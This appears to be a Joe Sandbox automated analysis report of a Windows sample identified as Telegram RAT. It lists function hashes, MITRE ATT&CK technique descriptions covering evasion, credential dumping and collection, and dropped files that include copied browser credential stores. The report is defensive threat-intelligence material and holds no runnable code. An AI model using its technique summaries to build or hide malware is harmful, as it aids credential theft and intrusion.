API ID:
String ID: #A$A4_^
API String ID: 0-3005688287
Opcode ID: 0df206faf42945db4e63aecf850c2914a163243b47f132efdb503b741a94da11
Instruction ID: aeb319f08c58a46dad113c5d823980178130e806572d546aaacedd6b35b2292f
Opcode Fuzzy Hash: 0df206faf42945db4e63aecf850c2914a163243b47f132efdb503b741a94da11
Instruction Fuzzy Hash: 6391A2279593A79AD701BEFCF4811E937909F427BE708A373D08C5D093CD2C648AAB85

Function 00007FF886FC10FA Relevance: 1.5, Strings: 1, Instructions: 229COMMON

Download Yara Rule

Strings

3M_^, xrefs: 00007FF886FC1101

Memory Dump Source

Source File: 00000002.00000002.1535098433.00007FF886FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff886fc0000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID: 3M_^
API String ID: 0-174631848
Opcode ID: 7ab451a6194908980541c23b6cd6ffca0634e061bd294fc685e31eb38444fe19
Instruction ID: 271444bb2c03607713fcab7c5fd08f990bf4391cc9e811598627420d110a85d8
Opcode Fuzzy Hash: 7ab451a6194908980541c23b6cd6ffca0634e061bd294fc685e31eb38444fe19
Instruction Fuzzy Hash: BE515E1799C4AF85E2117AF9B4466FDAB40DF423BEB088777E14C990838D0C64898BD6

Function 00007FF887150318 Relevance: 1.4, Strings: 1, Instructions: 194COMMON

Download Yara Rule

Strings

#A, xrefs: 00007FF887150396

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID: #A
API String ID: 0-195859853
Opcode ID: e7467f44efd868b6bc61da08dd1c8ec8e7e086a7d7d7843dc5b81db52f421de0
Instruction ID: e587e18a681a3cb7d3584dd4b1ab254241677c5e84308749c99bf8c5400955ee
Opcode Fuzzy Hash: e7467f44efd868b6bc61da08dd1c8ec8e7e086a7d7d7843dc5b81db52f421de0
Instruction Fuzzy Hash: EF51802795936B9AD704FEBCF4811E53390DF4277E708A737C18C9D0A3D928608BAB85

Function 00007FF887151AC7 Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

)4_^, xrefs: 00007FF887151B01

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID: )4_^
API String ID: 0-1860980620
Opcode ID: 118d0f7bb295d27dd9a44443e681806ecb0c81b260df3d688ea93a508eb90543
Instruction ID: f2530bec554b27106050e838b9e22c89d18c17c8c2e1ef9f60e7dc6f5f955164
Opcode Fuzzy Hash: 118d0f7bb295d27dd9a44443e681806ecb0c81b260df3d688ea93a508eb90543
Instruction Fuzzy Hash: 9911E0576657269A584039BCB0402EA13D89F6AB79718B237C00CCF1A3C49414C7B7D6

Function 00007FF887151AFB Relevance: 1.3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

)4_^, xrefs: 00007FF887151B01

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID: )4_^
API String ID: 0-1860980620
Opcode ID: ab1c1af1a0f2edb32e88ad80545c70b22bb9312392311f78aadfacffaaa5f66a
Instruction ID: c86f676137bcf6ad729e7dcc2f58a3ab535a366c9428912cb3a68465c271ff9d
Opcode Fuzzy Hash: ab1c1af1a0f2edb32e88ad80545c70b22bb9312392311f78aadfacffaaa5f66a
Instruction Fuzzy Hash: D2019E93966766AA594039BCB0512E613D84F2EB7D718B333D00CCF2A384D814C7B7D6

Function 00007FF88714DC55 Relevance: .5, Instructions: 528COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 541fd0e64e05bdb24c3740db21e6791ea7d65cc5599dd747e7c1cf70580db226
Instruction ID: 4202193630ac81e9cbce2ca02be46569b566cee24a690a1968d4ea5e4c794304
Opcode Fuzzy Hash: 541fd0e64e05bdb24c3740db21e6791ea7d65cc5599dd747e7c1cf70580db226
Instruction Fuzzy Hash: 4BF14924E4CA968EE7AD9768809427EBBE1FF86390F144179D0CEC75D6DE2CA843D341

Function 00007FF8871200A0 Relevance: .4, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7759cc0c77277e52f5b75cab45567d8ea8fea8119ecf577d6a0e2e69ece875b9
Instruction ID: 4ebcf622c49aa06157da291bf85bbd1671596a46c1a0a790a31b1d0de334c000
Opcode Fuzzy Hash: 7759cc0c77277e52f5b75cab45567d8ea8fea8119ecf577d6a0e2e69ece875b9
Instruction Fuzzy Hash: 46A1E53592C6494FEB68CA5C98453BDBBF0FB95360F14457AD44DC3682EE29EC42C782

Function 00007FF886FC1035 Relevance: .3, Instructions: 308COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1535098433.00007FF886FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff886fc0000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5620bd9f1f28d8f5dc50ceb906196f9f299255a3aad6fb2785f09b4baeab02f4
Instruction ID: 3233081c3eae5621f06ff918af28e6756d69f7db732c72cccc4b3e6468997e63
Opcode Fuzzy Hash: 5620bd9f1f28d8f5dc50ceb906196f9f299255a3aad6fb2785f09b4baeab02f4
Instruction Fuzzy Hash: 57917D1796C5EF89E2117AFDB4526F96B50DF423BEB084377E14C990838D0C648A8BD6

Function 00007FF8871391FA Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34e66f9bc04b3ba4442f98058f9472ef128612b861dc8c68eb728b0428155bac
Instruction ID: 9075ecfb9ee146e9356f556736c278cf08464f30826263b872fb3d2c61bcc72b
Opcode Fuzzy Hash: 34e66f9bc04b3ba4442f98058f9472ef128612b861dc8c68eb728b0428155bac
Instruction Fuzzy Hash: 3B516252DAC1AB95E1113AF8B4062FE6B549F413FEB088777E00C6E083CD0C64898BD7

Function 00007FF8871391F8 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d7a2613296b8a16c5cda5dd96aed27ad9dfd2439a0292f08ccc861f914e0fc
Instruction ID: c9f32dfe4a627aef2775341c75879e9542974df13c083b17c10e1baa109b2553
Opcode Fuzzy Hash: 76d7a2613296b8a16c5cda5dd96aed27ad9dfd2439a0292f08ccc861f914e0fc
Instruction Fuzzy Hash: 52513D52CAC1AB95E1117AF8B4066FE6B549F413FEB088777E04C6E0878D0D64898BDB

Function 00007FF887139200 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9e13cf468b4a31026d705e615acaca92946f5a39d846218c83326c9a12889a9
Instruction ID: b6021e7c418a01cde7a2cbc8f3f97a2271750345830653cc2363f66a46b5e6df
Opcode Fuzzy Hash: b9e13cf468b4a31026d705e615acaca92946f5a39d846218c83326c9a12889a9
Instruction Fuzzy Hash: 7E513D52CAC5AB95E1117AF8B4066FE6B549F413FEB088777E00C6E0878D0D64898BDB

Function 00007FF887140B1B Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a68cb3ae790ad78f98ee3f8193918708883c529c2dd0eb2913428922a1123619
Instruction ID: 86458dea8079a0ae73a472072402af9fba6a495e213886e81a2f1e66971d2445
Opcode Fuzzy Hash: a68cb3ae790ad78f98ee3f8193918708883c529c2dd0eb2913428922a1123619
Instruction Fuzzy Hash: 3F51D8579AC0DB85DA403EF8B4012E92710DF417BEB094BB7D0AD9D083DD0C708A9BD6

Function 00007FF887123285 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2500e16f1749346de0e8764d90e1cb410c866b326fc600935f7ef6a74e4e7ab
Instruction ID: 1e2be623b9a009205d79abf7d0ef389a6fe1b28cb3264f30fb56b00e74b79ffc
Opcode Fuzzy Hash: e2500e16f1749346de0e8764d90e1cb410c866b326fc600935f7ef6a74e4e7ab
Instruction Fuzzy Hash: A951D639E6C64A4BFB74895C888537DBAE4FB563A0F100576D44EC3A82ED1DFD82C192

Function 00007FF8871504F2 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f915dd16305b1ba6d87d6650d351f4411685e645ceeed00ce488accadb63d5ca
Instruction ID: 8355ca21739c91d97611c57e29194ff5407f31148684e91f1b1b421de78eb60a
Opcode Fuzzy Hash: f915dd16305b1ba6d87d6650d351f4411685e645ceeed00ce488accadb63d5ca
Instruction Fuzzy Hash: 5441801389A2EB9AE6017AFCB4512E63B905F0677D70953B7D0CC5E0A3CC1C608F978A

Function 00007FF88713BACC Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a25dee31316c02327042511914e3e178dd392a81a0d282a6d283fb9749e53cc0
Instruction ID: e9f67cdd5c1f13731ccbc81805f0449002a26a56460616bda2d980625ee3609d
Opcode Fuzzy Hash: a25dee31316c02327042511914e3e178dd392a81a0d282a6d283fb9749e53cc0
Instruction Fuzzy Hash: A031D420B4D68A0FE7714629485123A7BE2FB97364F25817AC489C399EEC2DAC038346

Function 00007FF8871503D3 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a13499de9512c2dbae70d6dcea3f760b2c13e099a943e57f591cd7c043b37fb7
Instruction ID: 9334d748f2129b1d509b038585711117c8ad269448c7727cf54d52d9db7910ba
Opcode Fuzzy Hash: a13499de9512c2dbae70d6dcea3f760b2c13e099a943e57f591cd7c043b37fb7
Instruction Fuzzy Hash: F831D7379593969AD341FEBCF4910E53790DF427793086377C0CC8E0A3D928548B6B85

Function 00007FF887142498 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 726156c31a57dfcab7fb02d0ee9fadfba1798449b6407099e80a90aab719dafd
Instruction ID: 9702ae8c00d3860600137f8144304cba24b81e798d4c7da2206433d8ff24557f
Opcode Fuzzy Hash: 726156c31a57dfcab7fb02d0ee9fadfba1798449b6407099e80a90aab719dafd
Instruction Fuzzy Hash: 593157268B819B86E2447EF8F4522E973509F4037E7488B77E0DD6D083DE2C608D4B9A

Function 00007FF8871504F0 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc2c91a614c35c4c3a9e16d043c4e70810bd08411b14caf25e2ce36b24350168
Instruction ID: 86c1974a4fcb2bca1946d11e287c5f68377adde12ae46ad4b00cbccd80ae21ac
Opcode Fuzzy Hash: fc2c91a614c35c4c3a9e16d043c4e70810bd08411b14caf25e2ce36b24350168
Instruction Fuzzy Hash: BC31521689A2EB99D6017AFCB4551E63B505F0277D70853B7E0CC5E0A3CC1C648E9B9A

Function 00007FF8871505F2 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d83be38a81b1dc98dc86d49761986e66652e552f77c7764fffc944504aa428ec
Instruction ID: 918136b67e2db33224449229d4f09c04d133301fff11f8cd750039a2001dca2e
Opcode Fuzzy Hash: d83be38a81b1dc98dc86d49761986e66652e552f77c7764fffc944504aa428ec
Instruction Fuzzy Hash: F931521389A2EB9AE6117BBCB4921E57BA09F0677D70952B7D0CC5E053DC0C208F978A

Function 00007FF887151AD3 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2174dccac0cf7b4d0a044a2477151e80ace1ba0a6061b4c3d988ef901e9f94d
Instruction ID: aeacbdc706156ddda65311d10193ef818f8b7e85de1907885fc37a54100572e0
Opcode Fuzzy Hash: c2174dccac0cf7b4d0a044a2477151e80ace1ba0a6061b4c3d988ef901e9f94d
Instruction Fuzzy Hash: 111104935A673796580039BCB0401EA13D85F2ABBD708B333D00C8F1A3C88814C7B7C6

Function 00007FF887142508 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46e59caf778d2ce1dc71d5df40394539c483dfd72825af2b6a15c86aa9d3790d
Instruction ID: a253fb88aa8e3c62bd046a7b2528979d9789b38184c6ee6ecf13ae466bd991e9
Opcode Fuzzy Hash: 46e59caf778d2ce1dc71d5df40394539c483dfd72825af2b6a15c86aa9d3790d
Instruction Fuzzy Hash: 272199268B859B86E2447EF8F4462E96350DF003BE7048F36E0DDAD483CD1C60CE5B9A

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Yara Signatures

Memory Dumps

Sigma Signatures

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe.log

C:\Users\user\AppData\Local\Temp\3nxxd8pi.default-release\cert9.db

C:\Users\user\AppData\Local\Temp\3nxxd8pi.default-release\key4.db

C:\Users\user\AppData\Local\Temp\tmpB1FB.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpB20C.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpB43F.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpB47F.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpB4FD.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpB5AA.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpB628.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpB696.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpB724.tmp.dat

